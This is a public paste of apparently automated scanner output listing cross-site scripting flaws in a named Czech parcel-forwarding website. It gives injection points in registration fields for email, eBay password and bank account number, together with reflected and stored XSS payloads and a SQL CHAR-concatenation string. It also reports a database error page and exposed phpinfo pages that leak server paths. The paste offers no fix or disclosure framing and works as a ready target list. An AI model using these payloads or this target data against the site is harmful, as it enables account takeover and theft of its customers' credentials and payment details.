Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- XSS - Ceske eBay - http://www.cz-ebay.cz/
- Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL : http://www.cz-ebay.cz/index.php?pg=><body onload=alert(9)>
- Parameter Name: pg
- Parameter Type: Querystring
- Attack Pattern: ><body onload=alert(9)>
- Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
- Parameter Name: from
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000F8B)</script>
- Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
- Parameter Name: hodnota
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000F8F)</script>
- Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
- Parameter Name: to
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000FEC)</script>
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x001090)</script>
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Parameter Name: icq
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00109D)</script>
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Parameter Name: ebay_user_id
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0010A7)</script>
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Parameter Name: ebay_heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0010C3)</script>
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Parameter Name: cislo_uctu
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0010C8)</script>
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0010D6)</script>
- |||
- Permanent Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Injection URL: http://www.cz-ebay.cz/index.php?pg=processdata
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL : http://www.cz-ebay.cz/
- Vulnerable URL : http://www.cz-ebay.cz/preposilani-zasilek.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/zasilky-v-pondeli-5-9-nepujdou-40-1582233250.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-odjel-14-9-2011-40-1376678108.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/slevy-v-usa-pondeli-5-9-2011-40-2531919776.htm
- Vulnerable URL : http://www.cz-ebay.cz/drazby-na-ebay.htm
- Vulnerable URL : http://www.cz-ebay.cz/platba-za-vas-nakup.htm
- Vulnerable URL : http://www.cz-ebay.cz/asistovany-nakup.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/pobocka-v-us-1-8-2011-volno-40-2066549930.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/pripsani-plateb-sobota-23-7-nejde-40-1585178623.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/novy-prepravce-velkych-zasilek-40-2317439459.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality.htm
- Vulnerable URL : http://www.cz-ebay.cz/poslat-heslo.html
- Vulnerable URL : http://www.cz-ebay.cz/objednavka.html
- Vulnerable URL : http://www.cz-ebay.cz/onlineplatba.html
- Vulnerable URL : http://www.cz-ebay.cz/nase-reference.htm
- Vulnerable URL : http://www.cz-ebay.cz/zjistit-cenu.html
- Vulnerable URL : http://www.cz-ebay.cz/kontakty.htm
- Vulnerable URL : http://www.cz-ebay.cz/reference-vase-odkazy.htm
- Vulnerable URL : http://www.cz-ebay.cz/sledovani-zasiky.htm
- Vulnerable URL : http://www.cz-ebay.cz/cenik-dopravy-z-usa.html
- Vulnerable URL : http://www.cz-ebay.cz/nejcastejsi-otazky.htm
- Vulnerable URL : http://www.cz-ebay.cz/jak-vyplnit-objednavku.htm
- Vulnerable URL : http://www.cz-ebay.cz/o-nas.htm
- Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
- Vulnerable URL : http://www.cz-ebay.cz/dhl-a-celnice.htm
- Vulnerable URL : http://www.cz-ebay.cz/e-shopy-v-usa.htm
- Vulnerable URL : http://www.cz-ebay.cz/tabulky-velikosti.htm
- Vulnerable URL : http://www.cz-ebay.cz/cisla-nasich-uctu.htm
- Vulnerable URL : http://www.cz-ebay.cz/jak-se-registrovat-na-paypal.htm
- Vulnerable URL : http://www.cz-ebay.cz/vseobecne-obchodni-podminky.htm
- Vulnerable URL : http://www.cz-ebay.cz/baliky-z-cr-do-sveta.htm
- Vulnerable URL : http://www.cz-ebay.cz/jak-se-registrovat-na-ebay.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/novinka-zasilame-do-celeho-sveta-40-2572663284.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-naklada-se-28-5-40-1590853973.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/postrehy-z-celnice-po-1-4-40-2143184447.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/zmena-dph-limitu-od-1-4-40-2177005689.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/snehova-kalamita-aktualizovano-40-2330487069.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/dalsi-slevy-v-usa-40-2110623870.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/statistika-cz-ebay-cz-2010-40-2236731290.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/pozor-zmena-podavani-reklamace-40-2026090598.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/nestihli-jste-patecni-slevy-40-1948322321.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/nejvetsi-slevy-v-usa-aktualizovano-40-2100490938.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-sr-40-2503122119.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/novinka-dobiti-kreditu-online-40-1336274981.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/pon-6-9-2010-zasilky-neodesilame-40-1560935049.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/slevy-v-usa-6-9-2010-40-2214264886.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/co-pripravujeme-40-2397612199.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/co-prave-prodavame-40-1795285872.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/doprava-motorky-z-usa-40-1903903449.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/jak-odesilame-zasilky-z-usa-40-2157712930.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-odjizdi-13-8-40-2240573868.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/zdrzeni-odeslani-zasilek-z-usa-40-2450352741.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/prvni-zkusenost-z-dhl-40-2470834578.htm
- Vulnerable URL : http://www.cz-ebay.cz/aktuality/zmena-prepravni-spolecnosti-40-1980042709.htm
- Vulnerable URL : http://www.cz-ebay.cz/templates/processdata.html
- Injection URL: http://www.cz-ebay.cz/registrace.html
- |||
- [Possible] Permanent Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL : http://www.cz-ebay.cz/registrace.html
- Injection URL: http://www.cz-ebay.cz/index.php?pg=processdata
- Parameter Name: spamrobot
- Parameter Type: Post
- Attack Pattern: <script>ns(0x000DC0)</script>
- |||
- Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Vulnerable URL : http://www.cz-ebay.cz/templates/processdata.html
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- |||
- [Possible] Internal Path Leakage (*nix)
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.cz-ebay.cz/phpinfo.php
- Vulnerable URL : http://www.cz-ebay.cz/admin/phpinfo.php
- Identified Internal Path(s): /etc/php5/apache2
- /etc/php5/apache2/php.ini
- /etc/php5/apache2/conf.d
- /etc/php5/apache2/conf.d/curl.ini,
- /etc/php5/apache2/conf.d/gd.ini,
- /etc/php5/apache2/conf.d/imagick.ini,
- /etc/php5/apache2/conf.d/imap.ini,
- /etc/php5/apache2/conf.d/mcrypt.ini,
- /etc/php5/apache2/conf.d/mhash.ini,
- /etc/php5/apache2/conf.d/mysql.ini,
- /etc/php5/apache2/conf.d/mysqli.ini,
- /etc/php5/apache2/conf.d/pdo.ini,
- /etc/php5/apache2/conf.d/pdo_mysql.ini,
- /etc/php5/apache2/conf.d/pdo_pgsql.ini,
- /etc/php5/apache2/conf.d/pdo_sqlite.ini,
- /etc/php5/apache2/conf.d/pgsql.ini,
- /etc/php5/apache2/conf.d/pspell.ini,
- /etc/php5/apache2/conf.d/sqlite.ini,
- /etc/php5/apache2/conf.d/tidy.ini,
- /etc/php5/apache2/conf.d/xmlrpc.ini,
- ---------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement